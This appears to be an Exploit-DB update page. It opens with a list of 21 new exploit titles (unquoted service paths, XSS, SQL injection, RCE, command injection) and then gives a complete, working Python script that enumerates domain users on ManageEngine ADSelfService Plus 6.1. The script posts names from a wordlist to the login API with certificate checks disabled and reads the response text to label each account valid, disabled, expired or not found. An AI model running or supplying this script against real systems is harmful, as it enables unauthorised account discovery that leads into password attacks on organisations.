
21 changes to exploits/shellcodes Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path 7-zip - Code Execution / Local Privilege Escalation PTPublisher v2.3.4 - Unquoted Service Path EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path Zyxel NWA-1100-NH - Command Injection ManageEngine ADSelfService Plus 6.1 - User Enumeration Verizon 4G LTE Network Extender - Weak Credentials Algorithm Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF) Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS) Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure Scriptcase 9.7 - Remote Code Execution (RCE) WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection Easy Appointments 1.4.2 - Information Disclosure WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS) WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated) REDCap 11.3.9 - Stored Cross Site Scripting PKP Open Journals System 3.3 - Cross-Site Scripting (XSS) WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated) Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)
# Exploit Title: ManageEngine ADSelfService Plus 6.1 - User Enumeration
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: ADSelfService 6.1 Build 6121
# Tested Against: Build 6118 - 6121
# Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
# !/usr/bin/python3
import requests
import sys
import time
import urllib3
from urllib3.exceptions import InsecureRequestWarning
"""
Domain users can be enumerated with this exploit, in the same way as the userenum module of the kerbrute tool.
If a brute-force attack was recently run against a user, wait 30 minutes (default settings) before running the script; otherwise the results can be false positives.
"""
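def request(target, user):
    """Submit one login name to the login API and print what the answer reveals.

    The check works because the response body differs with the account state
    (valid, disabled, expired, unknown). That difference is the enumeration
    oracle: a server answering every login name with one uniform message
    leaves this function nothing to match on, and the final branch below
    reports exactly that case instead of staying silent.

    Args:
        target: Base URL of the instance. It must end with "/" because the
            API path is appended without a separator.
        user: Login name to submit.

    Returns:
        None. The outcome is printed to stdout.
    """
    # NOTE(review): certificate verification is disabled (verify=False below)
    # and the matching warning is silenced, so the server's identity is never
    # checked and the login name travels over an unauthenticated channel.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    url = target + 'ServletAPI/accounts/login'
    data = {"loginName": user}
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"}

    try:
        # A timeout keeps one unresponsive host from blocking the whole run.
        req = requests.post(url, data=data, headers=headers, verify=False, timeout=10)
    except requests.exceptions.RequestException as err:
        # Report the failure and let the caller continue with the next name.
        print("[-] Request for " + user + " failed: " + str(err))
        return

    # For debugging
    # print("[*] Response for " + user + ": " + req.text.strip())
    if 'PASSWORD' in req.text:
        print("[+] " + user + " is VALID!")
    elif 'Your account has been disabled' in req.text:
        print("[+] " + user + " account has been DISABLED.")
    elif 'Your account has expired' in req.text:
        print("[+] " + user + " account has EXPIRED.")
    elif 'Enter the text as shown in the image.' in req.text:
        # The server asked for the text shown in an image, so the account
        # state cannot be read from this response.
        print("[!] The exploit doesn't detect expired and disabled users. Please, run it after the 30 minutes. ")
    elif 'Permission Denied.' in req.text:
        print("[-] " + user + " is not found.")
    else:
        # None of the known markers matched (for example a build that answers
        # uniformly); say so rather than printing nothing.
        print("[?] Unrecognized response for " + user + " (HTTP " + str(req.status_code) + ")")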
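def get_users(target, file):
    """Read login names from a file and check each one against the target.

    Args:
        target: Base URL handed through to request().
        file: Path of a text file holding one login name per line.

    Exits with status 1 when the file does not exist.
    """
    try:
        # The context manager closes the handle even if a request raises;
        # the original left the file open and rebound the `file` parameter.
        with open(file, "r") as handle:
            for line in handle:
                name = line.strip()
                if not name:
                    # A blank line would otherwise be sent as an empty login
                    # name and produce a meaningless result line.
                    continue
                # Fixed half-second pause before every request.
                time.sleep(0.5)
                request(target, user=name)
    except FileNotFoundError:
        print("[-] File not found!")
        sys.exit(1)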
def main(args):
    """Validate the command line and start the user check.

    Args:
        args: Argument vector; exactly three entries are expected
            (program name, base URL, path of the usernames file).

    Prints a usage message and exits with status 1 for any other count.
    """
    if len(args) == 3:
        _, base_url, userlist = args
        get_users(target=base_url, file=userlist)
        return

    prog = args[0]
    print("[*] Usage: %s url usernames_file" % (prog))
    print("[*] Example: %s https://target/ /tmp/usernames.txt" % (prog))
    sys.exit(1)
if __name__ == "__main__":
    # Script entry point: pass the raw argument vector to main().
    main(sys.argv)